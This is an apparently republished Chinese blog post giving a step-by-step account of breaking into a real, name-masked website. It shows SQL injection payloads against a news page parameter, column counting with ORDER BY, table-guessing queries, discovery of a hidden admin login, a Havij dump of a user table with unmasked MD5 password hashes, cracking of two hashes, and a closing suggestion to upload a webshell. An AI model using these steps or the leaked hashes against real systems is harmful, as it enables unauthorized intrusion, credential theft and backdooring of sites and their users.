记一次简单渗透之旅(一)

来源:互联网 发布:javascript offsettop 编辑:程序博客网 时间:2024/04/28 01:41

不知不觉又长了一年,曾经的我,面对红与黑向来不予置评,可骨感的现实却让人无意瞥见那一抹悲哀,让一直倔强的人啊变成了如今这幅摸样

好了闲话不多说,就将曾经第一次学渗透的时候的一个简单笔记列出来供大家分享,希望有些用处。。。

以下分享纯粹是为了学习之用,希望对有帮助的盆友不会用某些技术来做坏事。。。

----------------------------------------------------------------------------------------------------------------------------------------------

由于某些原因,网站不方便了列出,用www.××××.com代表

------------------------------------------------------------------------------------------------------------------------------------------------

大家好,我是水东流  QQ:  2875984313    (美女加,男吊丝勿扰)



第1次做教程,做的不好请见谅,


我们的QQ群:黑蚂蚁技术联盟渗透部  126931620(有兴趣加,朋友群)


好了,我们开始,,


今天的目标站:http://www.******.com

1、探测网站http://www.××××.com信息


2、打开http://www.××××.com网址


3、点击进入一个页面如:http://www.××××.com/en/news_v.asp?id=51


4、简单测试看看是否存在sql注入漏洞
http://www.××××.com/en/news_v.asp?id=51`
发现还确实存在漏洞


5、猜测相关字段比如利用order by *  
http://www.××××.com/en/news_v.asp?id=51%20order%20by%206
。。。
http:/www.××××.com/en/news_v.asp?id=51%20order%20by%207等等


结果发现:http://www.××××.com/en/news_v.asp?id=51%20order%20by%206显示正常
。。。
http://www.××××.com/en/news_v.asp?id=51%20order%20by%207显示错误


由此可知access表一共有6个字段,下面就可以来猜测账号、密码字段




6、利用and 0<>(select count(*) from admin)猜测是否存在admin这张表


结果不行了,似乎有点问题。。。


继续寻找方法
根据以往的经验,后台一般是网站后面跟着/admin、/manage等常见的后台目录,这里测试一下


7、构造地址:http://www.××××.com/admin  并且打开


结果显示错误404
将admin换成robots.txt试一试,结果还是不行


考虑到现在很多管理人员都将都有安全意识,然后有些人又喜欢自作聪明的仅仅


只是在admin前面加上web前缀,所以试一试webadmin看看行不行


哎呀,行了!




8、登陆网站后台http://www.××××.com/webadmin/login.asp,猜测账号以及密码


很显然后台登陆界面写的很差,连个基本的验证码都没有,但也不能就说它的程序写得差。


好了进入正题:
由于没有猜到正确的账号和密码,那么先可以查看它对应的源码来试试运气,希望可以成功。


发现右键功能被屏蔽。用菜单的查看-查看源码功能。
发现input name=userid id-----userID   validator---uid
  id--------userPassword  validator------password


利用6中的and 0<>(select count(*) from userID) 进行测试


没发现


转而利用:and 1=2 and exists(select * from admin)试试运气
将admin换成manager、tabmanager、userID、user等等都没有发现
虽然没有找到,但是在改成user的时候网页显示的信息结果与其他的都不一样的,可能是做了
相关的处理,具体不知。。。。0.0。。。。
所以接下来就是用相关的注入工具进行相关的测试工作。。


9、使用sql注入工具havij试试


操作不多少,相当简单,直接输入注入网址就行了。
结果发现相关DBs信息情况:
------------------------------------------------------------
DBS:MsAccess
------------------------------------------------------------
Tables:user  
-------------------------
Columns:email
password
username
id
-------------------------
Datas: 
××××@htomail.com    827ccb0eea8a706c4c34a16891f84e7b  ×××××  1


......
--------------------------------------------------------------
相关扫描的数据结果如下;
Data Found: email=××××××@hotmail.com


Data Found: password=827ccb0eea8a706c4c34a16891f84e7b


Data Found: username=××××


Data Found: id=1


Data Found: email=××××××××@yahoo.com


Data Found: password=d3af9e9ab49a6d3f8e7e9ec03902402a


Data Found: username=×××××××


Data Found: id=10


Data Found: email=xx×××@sina.com


Data Found: password=5ce6308eae951da74d27580bd23e7ca4


Data Found: username=xx×××××××


Data Found: id=11


Data Found: email=××××××××@sina.com


Data Found: password=827ccb0eea8a706c4c34a16891f84e7b


Data Found: username=××××××××


Data Found: id=12


Data Found: email=×××××××@163.com


Data Found: password=354fadaddfc4c03f3ee294d299381113


Data Found: username=××××××××



------------------------------------------------------------------


虽然上一步中改成user的探测没有成功但是可以肯定的是数据库中确实是有user表的。




10、接下来就是对于md5值进行相关解密,查询网址:http://www.cmd5.com/




id=1
username=××××
password=827ccb0eea8a706c4c34a16891f84e7b  -----解密后-----12345


id=11
username=×××××
password=5ce6308eae951da74d27580bd23e7ca4  -----解密后-----xxb380




后面的就不进行解密了,知道怎么解密就行......
上面数据只是部分而已,邮箱以及账号部分都做了处理。。。。



11、重新尝试步骤8,登陆操作,验证账号密码是否可行

12、如果登录成功,上传什么马就看大家自己的意愿了。。。。

如果不成功,可能是由某些原因但是一般的得到账号密码的简单步骤也就。。。。。

0 0
原创粉丝点击